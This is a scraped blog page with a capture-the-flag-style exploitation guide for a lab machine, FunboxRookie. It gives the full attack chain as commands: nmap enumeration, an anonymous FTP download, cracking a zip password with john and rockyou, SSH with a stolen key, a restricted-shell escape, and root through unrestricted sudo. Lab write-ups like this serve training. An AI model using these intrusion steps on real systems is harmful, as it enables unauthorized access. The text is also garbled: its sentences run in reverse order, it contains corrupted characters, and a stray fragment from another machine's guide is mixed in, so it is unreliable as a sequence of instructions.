The first one will identify open ports, and the second one will attempt to discover more information about each service. We initiate our enumeration of the target by launching two nmap scans. Uid=0(root) gid=0(root) Guide for Born2Root Summaryīorn2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs. (ALL : ALL) can easily use this to get a root shell: sudo id User tom may run the following commands on funbox2: Matching Defaults entries for tom on funbox2: Trying the password for the user to enumerate sudo privileges works, and we see that user tom is actually able to run any command with sudo, providing the password: sudo -l rw- 1 tom tom 295 Jul 25 12:04 this file, we see the history of several MySQL commands: cat command insert\040into\040support\040(tom,\040xx11yy22!) looks very interesting as it contains string xx11yy22! that looks like a password. Looking around the user’s home directory, we find a MySQL history file: cd ls -la Load pubkey "id_rsa": invalid cd are now able to traverse and enumerate the system further. rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command namesĬonnection to 192.168.120.138 ssh -o StrictHostKe圜hecking=no -i id_rsa -t "bash -noprofile" rbash: cd: are many ways to do so, and we will choose one of the easiest ones (exiting the current shell and then reconnecting with the flag -t "bash -noprofile"): exit Uid=1000(tom) gid=1000(tom) Restricted Shellīut, if try to change directory or any of the other restricted commands, we will find that our default shell upon login is rbash, which we must first escape: cd. Next, we will set proper key file permissions and then SSH to the target: chmod 0600 ssh -o StrictHostKe圜hecking=no -i id_rsa id Since we have obtained the private key from the archive tom.zip, we can assume that the user is named tom. Inflating: have obtained a private SSH key file id_rsa. Using it, we can unlock the archive: unzip -P iubire tom.zip Session cracker succeeds and reveals that the password is iubire. Use the "-show" option to display all of the cracked passwords reliably Ver 2.0 efh 54 tom.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, can now use john and the rockyou.txt wordlist to crack the password: john -wordlist=/usr/share/wordlists/rockyou.txt tom.hash We can use zip2john to convert the encrypted archive to a hash file usable by john: zip2john tom.zip > tom.hash If you have any unusual problems,Ģ30 Anonymous access granted, restrictions applyġ50 Opening BINARY mode data connection for tom.zip (1477 bytes)ġ477 bytes received in 0.00 secs (28.1715 MB/s)Ģ21 if we try to open the archive, we will find that it is password-protected. Next, we can log in and retrieve it: ftp 192.168.120.138Ģ20 ProFTPD 1.3.5e Server (Debian) ģ31 Anonymous login ok, send your complete email address as your passwordĢ30-The local time is: Wed Oct 14 17:11:13 2020Ģ30-This is an experimental FTP server. Of the files shown in the scan, only file tom.zip will prove useful to us. The FTP server listening on the default port allows for anonymous logins, and we see several zip files listed. |_http-title: Apache2 Ubuntu Default Page: It works | ftp-anon: Anonymous FTP login allowed (FTP code 230) We can run a more detailed nmap scan with the -sC flag against the discovered ports: sudo nmap -p 21,22,80 192.168.120.138 -sC We start off by running an nmap scan: sudo nmap 192.168.120.138 It is escalated via open sudo that allows the user to run any command with elevated privileges. This machine is exploited with an anonymous FTP server containing file id_rsa and then the disclosure of user credentials in a history file. Exploitation Guide for FunboxRookie Summary
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |